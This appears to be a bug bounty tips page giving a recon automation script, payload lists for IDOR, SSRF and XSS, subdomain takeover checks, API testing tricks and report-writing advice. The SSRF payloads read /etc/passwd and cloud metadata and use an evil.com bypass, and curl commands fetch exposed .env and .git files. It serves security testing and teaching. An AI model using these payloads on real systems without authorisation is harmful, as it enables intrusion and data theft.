Bug Bounty Tips & Tricks

Proven strategies and techniques for successful bug bounty hunting. Master reconnaissance automation, identify high-impact vulnerabilities, and write compelling reports that maximize your earnings and impact.

Recon Automation & Toolkit

Complete Recon Pipeline

#!/bin/bash
# Automated bug bounty recon script
# Usage: ./recon.sh target.com

TARGET=$1
OUTPUT_DIR="${TARGET}_recon_$(date +%s)"
mkdir -p "$OUTPUT_DIR"

echo "[*] Starting recon on $TARGET"

# Step 1: Subdomain enumeration
echo "[*] Enumerating subdomains..."
subfinder -d $TARGET -o "$OUTPUT_DIR/subdomains.txt" 2>/dev/null
assetfinder --subs-only $TARGET >> "$OUTPUT_DIR/subdomains.txt" 2>/dev/null
sort -u "$OUTPUT_DIR/subdomains.txt" > "$OUTPUT_DIR/subdomains_final.txt"

# Step 2: Screenshot each subdomain
echo "[*] Taking screenshots..."
cat "$OUTPUT_DIR/subdomains_final.txt" | aquatone -out "$OUTPUT_DIR/aquatone"

# Step 3: Port scanning
echo "[*] Port scanning..."
cat "$OUTPUT_DIR/subdomains_final.txt" | naabu -rate 150 -output "$OUTPUT_DIR/ports.txt"

# Step 4: Service discovery
echo "[*] Probing services..."
cat "$OUTPUT_DIR/ports.txt" | httpx -o "$OUTPUT_DIR/alive.txt"

# Step 5: Directory brute force on live hosts
echo "[*] Fuzzing directories..."
cat "$OUTPUT_DIR/alive.txt" | while read url; do
    ffuf -u "$url/FUZZ" -w /usr/share/wordlists/dirb/common.txt \
         -o "$OUTPUT_DIR/$(echo $url | cut -d'/' -f3).json"
done

echo "[+] Recon complete! Results in: $OUTPUT_DIR"

Key Tools Setup

# Install essential tools
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/tomnomnom/assetfinder@latest
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/ffuf/ffuf@latest

# Install with apt
sudo apt install -y burpsuite zaproxy sqlmap niknikto

# Screenshot tools
npm install -g aquatone

# Domain/subdomain tools
pip3 install dnsrecon dnsenum

High-Impact Vulnerabilities

IDOR (Insecure Direct Object Reference)

# Discovery technique
# 1. Find endpoints with user-specific data
/api/profile/123
/api/orders/456
/documents/789

# 2. Test with different IDs
# Change ID to sequential number
/api/profile/124
/api/profile/125

# 3. Try ID manipulation
/api/profile/124%00
/api/profile/124.json
/api/profile/124/
/api/profile/124%2e%2e%2f

# Advanced IDOR
# UUID-based endpoints
# Change single character: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
# Test with known UUIDs

# Hash-based endpoints
# Weak hashing: MD5(id)
# md5 -s "123" = 202cb962ac59075b964b07152d234b70

SSRF (Server-Side Request Forgery)

# Discovery
/api/fetch?url=http://example.com
/api/download?url=
/api/preview?src=
/proxy?url=

# Exploitation
# Local file access
?url=file:///etc/passwd
?url=file:///var/www/html/config.php

# Internal services
?url=http://localhost:8080/admin
?url=http://127.0.0.1:8080
?url=http://192.168.1.1/
?url=http://169.254.169.254/latest/meta-data/  # AWS

# URL encoding bypass
?url=http://127%2e0%2e0%2e1
?url=http://localhost//admin
?url=http://localhost:@evil.com@localhost/

# DNS rebinding
# Create attacker domain pointing to localhost

XSS (Cross-Site Scripting)

# Common injection points
# Search: /search?q=<script>alert('xss')</script>
# Comments: /post/123#comment=<img src=x onerror="alert('xss')">
# Usernames: /profile?name=<svg onload="alert('xss')">

# Payloads
<script>alert('XSS')</script>
<img src=x onerror="alert('XSS')">
<svg onload="alert('XSS')">
<iframe src="javascript:alert('XSS')">
<body onload="alert('XSS')">
<input onfocus="alert('XSS')" autofocus>

# Context-aware payloads
# In HTML: <script>alert(1)</script>
# In JavaScript string: '</script><script>alert(1)</script>
# In attribute: " onclick="alert(1)

# Advanced XSS
# Unicode/UTF-8 bypasses
\u003cscript\u003ealert('XSS')\u003c/script\u003e
# HTML encoding
&#60;script&#62;alert('XSS')&#60;/script&#62;

Subdomain Takeover

# Discovery
# Find subdomains pointing to services no longer in use
# Check CNAME records

# Identify vulnerable services
# Check if CNAME points to:
# - Heroku
# - GitHub Pages
# - Shopify
# - AWS CloudFront
# - etc.

# Verification
dig subdomain.target.com CNAME
nslookup subdomain.target.com

# Tools
subzy --targets subdomains.txt
subjack -w /path/to/subdomains.txt -t 100

# Common vulnerable CNAMEs
# *.herokuapp.com - verify ownership
# *.github.io - create repo with same name
# *.shopify.com - claim shop
# cloudfront - create distribution

Vulnerability Chaining & Logic Bugs

Authentication Bypass

# Password reset flaws
# - Weak token generation
# - Token reuse
# - Expired tokens still valid
# - Email-based with predictable patterns

# 2FA/MFA bypass
# - SMS interception
# - Backup code misuse
# - Race condition in validation
# - Null/empty bypass

# Session issues
# - Session fixation
# - Weak session tokens
# - Cookie theft
# - Concurrent session abuse

Business Logic Flaws

# Price manipulation
# Modify price in request/response
# Discount stacking
# Negative amount exploitation

# Race conditions
# Buy same limited item twice
# Process payment twice
# Exploit timing windows

# Workflow bypass
# Skip steps in multi-step process
# Reorder workflow steps
# Access unauthorized stages

# Example: E-commerce checkout
# 1. Add item to cart
# 2. Apply discount (100% off)
# 3. Complete purchase
# Test: Apply discount twice, negative quantity, etc.

Information Disclosure

# Source code leakage
# .git exposed
# .env files accessible
# Backup files (.bak, .old, .zip)

# API endpoint discovery
# /api/v1/* usually has more endpoints than v2
# Check swagger/openapi endpoints
# /api/*/docs, /api/*/schema

# Sensitive data in responses
# User IDs, internal IDs
# Error messages revealing structure
# Timing attacks (username enumeration)

# Detection
curl -s https://target.com/.git/config
curl -s https://target.com/.env
find . -name "*.bak" -o -name "*.old" -o -name "*.zip"

Effective Report Writing

Report Template Structure

# Bug Report: [Vulnerability Type]

## Summary
Brief description of the vulnerability and its impact

## Vulnerability Details
- Type: IDOR, SSRF, XSS, etc.
- Severity: Critical/High/Medium/Low
- CVSS Score: 8.5
- CWE: CWE-639 (Authorization Bypass)

## Description
Detailed explanation of the vulnerability:
- What the vulnerability is
- How it was discovered
- Why it's a vulnerability
- Technical details

## Proof of Concept
Step-by-step instructions to reproduce:
1. Login as user A
2. Navigate to /api/profile/123
3. Change ID to 124
4. Request is successful (should be denied)

Include:
- HTTP requests/responses
- Screenshots
- Videos (for complex vulnerabilities)
- Code snippets

## Impact Assessment
- **Confidentiality**: User data exposure
- **Integrity**: Unauthorized modifications
- **Availability**: Service disruption
- Business impact: "Attackers can access other users' sensitive documents"

## Affected Endpoints
- GET /api/profile/{id}
- GET /api/documents/{id}
- PUT /api/user/{id}/settings

## Remediation
Detailed fix recommendations:
1. Validate user has access to requested resource
2. Implement proper authorization checks
3. Use UUID instead of sequential IDs
4. Add access control lists

## Severity Justification
Why this is High/Critical:
- Easy to exploit
- No user interaction required
- Affects all users
- Sensitive data at risk

## Timeline
- Reported: 2025-03-15
- Acknowledged: 2025-03-16
- Fixed: 2025-03-20
- Verified: 2025-03-21

Report Writing Tips

# DO's
- Be clear and concise
- Include proof of concept
- Show business impact
- Provide actionable remediation
- Include severity justification
- Use professional language

# DON'Ts
- Be vague or unclear
- Include irrelevant information
- Make it overly technical
- Demand specific bounty amount
- Be threatening or demanding
- Submit before verifying the vulnerability

# Format tips
- Use markdown for clarity
- Include screenshots with annotations
- Provide video walkthrough for complex bugs
- Use proper spelling/grammar
- Organize logically
- Keep sensitive data out of examples

Staying Ahead of Competition

Program Selection Strategy

# Choose programs wisely
# High-paying programs
- Facebook: $500-$40,000+
- Google: $300-$15,600
- Microsoft: $500-$20,000
- Apple: $50-$200,000

# Less crowded programs
- Niche/vertical-specific companies
- Local/regional companies
- Newer programs with less competition
- Check hackerone.com for bounty statistics

# Program maturity indicators
- Time on platform
- Average bounty amount
- Response time
- Previous vulnerabilities
- Number of researchers

Efficiency Maximization

# Spend more time on reconnaissance
# 80/20 rule: 80% recon, 20% exploitation
# Most bugs are found in recon phase

# Focus on automation
# Create reusable scripts
# Batch process multiple targets
# Parallelize scanning

# Maintain notes/database
# Track which targets you've tested
# Note findings for each target
# Identify patterns

# Learn from writeups
# Read published bug reports
# Understand common patterns
# Study remediation techniques

# Time management
# Dedicate specific time to research
# Balance depth vs breadth
# Track ROI per target
# Know when to move on

Long-term Success

# Build reputation
# Document your findings
- Write detailed reports
- Include proof of concept videos
- Provide clear remediation guidance

# Engage with programs
- Communicate professionally
- Follow responsible disclosure
- Ask clarifying questions
- Provide updates during fix

# Diversify targets
- Don't rely on one program
- Balance easy wins with harder targets
- Try different vulnerability types
- Experiment with new techniques

# Continuous learning
- Stay updated on new vulnerabilities
- Learn new tools and techniques
- Study attacker methodologies
- Follow security conferences/blogs

Common Mistakes to Avoid

Reporting Mistakes

# ❌ Don't:
- Submit without verifying vulnerability
- Include sensitive data in reports
- Demand specific bounty amount
- Be disrespectful or threatening
- Report duplicate vulnerabilities
- Ignore scope limitations

# ✓ Do:
- Verify the vulnerability is real
- Redact sensitive information
- Provide clear proof of concept
- Be professional and courteous
- Check if already reported
- Follow program scope exactly

Discovery Mistakes

# ❌ Over-focusing on one target
# Solution: Diversify across programs

# ❌ Neglecting automation
# Solution: Build scripts for repetitive tasks

# ❌ Only testing obvious endpoints
# Solution: Deep dive into all functionality

# ❌ Giving up too quickly
# Solution: Spend sufficient time on each target

# ❌ Not reading past reports
# Solution: Study disclosed vulnerabilities

Technical Mistakes

# ❌ Not understanding the context
# Solution: Map entire application flow

# ❌ Testing in production directly
# Solution: Use staging/test environments

# ❌ Invalid proof of concept
# Solution: Ensure steps are reproducible

# ❌ Incomplete testing
# Solution: Test multiple scenarios/inputs

# ❌ Causing damage
# Solution: Be extra careful, never destroy data

Advanced Techniques

API Testing

# Find API endpoints
# Look for:
# - /api/
# - /v1/, /v2/
# - /rest/
# - GraphQL endpoints: /graphql

# Enumerate API
# Test GET, POST, PUT, DELETE, PATCH

# Test authentication
curl -H "Authorization: Bearer invalid_token" https://target.com/api/data

# Test with different API versions
# /api/v1/ might have fewer security checks

# API key discovery
# Check requests for patterns
# Headers: X-API-Key, Authorization
# Query params: ?api_key=
# Cookies

# Rate limiting bypass
# Rotate IP addresses
# Use sleep between requests
# Distribute across proxies

Parameter Pollution & Manipulation

# HTTP Parameter Pollution (HPP)
# Submit same parameter twice with different values
# ?id=1&id=2

# Server-side filter bypass
# ?filter[]=admin&filter[]=<script>

# Type juggling (PHP)
# "0" == "0e0" (both evaluate to 0)
# Use to bypass string comparisons

# Array truncation
# ?id[]=1 (becomes array instead of string)

# Null byte injection (older systems)
# ?file=config.php%00.jpg

# Case sensitivity bypass
# /Admin vs /admin
# /Upload.php vs /upload.PHP

Advanced Recon Tricks

# Wayback machine
# https://archive.org/web/
# Find old endpoints, outdated tech

# Certificate transparency logs
# Find subdomains from SSL certificates
# https://crt.sh/?q=target.com

# GitHub dorks
# site:github.com "target.com" password
# site:github.com "target.com" api_key

# Google dorking
# site:target.com filetype:pdf
# site:target.com inurl:admin
# site:target.com intext:password

# Shodan
# http.status:200 org:"Target Inc"
# Find all exposed services

# DNS data mining
# Reverse DNS lookups
# MX records can reveal infrastructure
# SPF/DKIM records

Bug Bounty Programs & Platforms

Major Programs

# HackerOne
# https://hackerone.com
# Average bounty: $300-$5,000
# Top programs: Dropbox, GitHub, Yahoo, Slack

# Bugcrowd
# https://bugcrowd.com
# Average bounty: $200-$3,000
# Top programs: Yahoo, Microsoft, Google

# Intigriti
# https://intigriti.com
# European-focused
# Average bounty: €200-€3,000

# YesWeHack
# https://yeswehack.com
# European platform
# Strong in France, Germany

# Synack
# https://synack.com
# Invitation-only
# Structured testing programs

# Program comparison
# Size of community
# Bounty ranges
# Average payout time
# Response time
# Type of vulnerabilities

Pro Tips for Program Selection

# Green programs (new to platform)
- Less competition
- Programs eager for feedback
- Often faster response times

# Programs with higher bounties
- Check disclosed reports
- Research company size/sector
- Tech companies generally pay more
- Finance/healthcare competitive

# Look for:
- Quick response times
- Professional communication
- Reasonable scope
- Clear guidelines
- History of paying
- Active community

Professional Development

Build Your Brand

# Start a blog
- Document your findings
- Share vulnerability analysis
- Publish write-ups
- Attracts attention from programs

# Twitter/Social Media
- Share tips and tricks
- Engage with security community
- Showcase findings (after disclosure)
- Network with other researchers

# GitHub
- Publish tools and scripts
- Share automation scripts
- Document methodologies
- Build portfolio

# Speaking & Teaching
- Security conferences
- Webinars
- Training courses
- Community talks

Income Streams

# Bug Bounties
- Primary income for many

# Consulting
- Sell services to companies
- Penetration testing
- Security assessments

# Training
- Udemy/Coursera courses
- Bootcamp instruction
- Workshop facilitation

# Tools & Services
- Security tools
- SaaS services
- Automation platforms

# Content
- YouTube channel
- Blog sponsorships
- Technical writing

Real-World Example: Finding IDOR

Scenario

Target: E-commerce application

Steps

# 1. Reconnaissance
# Identify API endpoints
# Look for user-specific data: /api/orders, /api/profile, /api/invoices

# 2. Request Analysis
curl -H "Authorization: Bearer token" https://target.com/api/orders/12345
# Response includes order details for user A

# 3. Test IDOR
curl -H "Authorization: Bearer token" https://target.com/api/orders/12346
# Should fail for user A but doesn't - IDOR found!

# 4. Verify Impact
# Access multiple other users' orders
# Document findings
# Test different API versions (/v2, /v3)

# 5. Proof of Concept
# Write reproducible steps:
# 1. Login as User A
# 2. Get token
# 3. Request /api/orders/123 (accessible)
# 4. Request /api/orders/124 (should be denied, but accessible)
# 5. Request /api/orders/9999 (random user ID - accessible)

# 6. Report
# Severity: High (access to all user data)
# Impact: Potential breach of PII
# Fix: Verify user owns resource before returning data

Expected Bounty

• Severity: High
• Impact: Moderate to High
• Typical Range: $500-$3,000
• Depends on program and sensitivity of data

Key Principles

Responsible Disclosure

• Never exploit vulnerabilities beyond proof of concept
• Don’t damage systems or data
• Don’t access more data than necessary
• Respect confidentiality
• Follow program guidelines
• Disclose timeframes

Communication

• Be professional and respectful
• Ask clarifying questions
• Respond promptly to program questions
• Follow up on progress
• Accept feedback gracefully
• Maintain confidentiality

Continuous Improvement

• Track your findings
• Analyze patterns
• Measure ROI per target
• Refine your techniques
• Learn from failures
• Share knowledge (responsibly)

Resources

Learning Platforms

• HackerOne Academy
• Bugcrowd University
• PortSwigger Web Security Academy
• Hack The Box

Communities

• Twitter Security Community
• Reddit r/bugbounty
• Discord servers

Tools

• BurpSuite
• OWASP ZAP
• Subfinder
• httpx
• ffuf
• Nuclei

---

Last updated: 2025-03-30